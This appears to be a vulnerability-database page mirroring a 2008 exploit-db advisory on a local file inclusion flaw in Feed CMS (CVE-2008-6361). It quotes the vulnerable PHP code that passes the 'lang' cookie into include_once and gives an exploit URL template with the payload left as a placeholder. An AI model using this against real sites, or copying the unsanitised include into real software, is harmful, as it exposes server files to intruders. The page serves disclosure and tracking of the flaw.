Lucene search
+L

Feed CMS 1.07.03.19b - 'lang' Local File Inclusion

🗓️ 11 Dec 2008 00:00:00Reported by x0rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

CMS 1.07.03.19b 'lang' Local File Inclusion vulnerability in Feed CM

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6361
11 Dec 200800:00
circl
cve
CVE
CVE-2008-6361
2 Mar 200916:00
cve
cvelist
Cvelist
CVE-2008-6361
2 Mar 200916:00
cvelist
euvd
EUVD
EUVD-2008-6331
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-6361
2 Mar 200916:30
nvd
prion
Prion
Directory traversal
2 Mar 200916:30
prion
###############################
Feed Cms 1.07.03.19 Beta LFI
###############################
Autore: x0r
Email: [email protected]
Download:
http://heanet.dl.sourceforge.net/sourceforge/feedcms/FeedCms1.07.03.19Beta.rar
###############################
Bug In: index.php

if ($_GET['lang'])
{
	$language = $_GET['lang'];

	setcookie('firstlang',$language,time()+3600*240*365);
	header('location:'.$redirect);
}
$lang = $_COOKIE['firstlang'] ? $_COOKIE['firstlang'] : $lang;
include_once($FeedCms_Dir."lang/$lang/$lang.php");

LFI By Cookie ^ ^

Exploit:

http://[site]/FeedCms/?lang=[LFI] ^ ^

Greetz: A Te Che Mi Hai Cambiato La Vita...

# milw0rm.com [2008-12-11]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jan 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.01846
28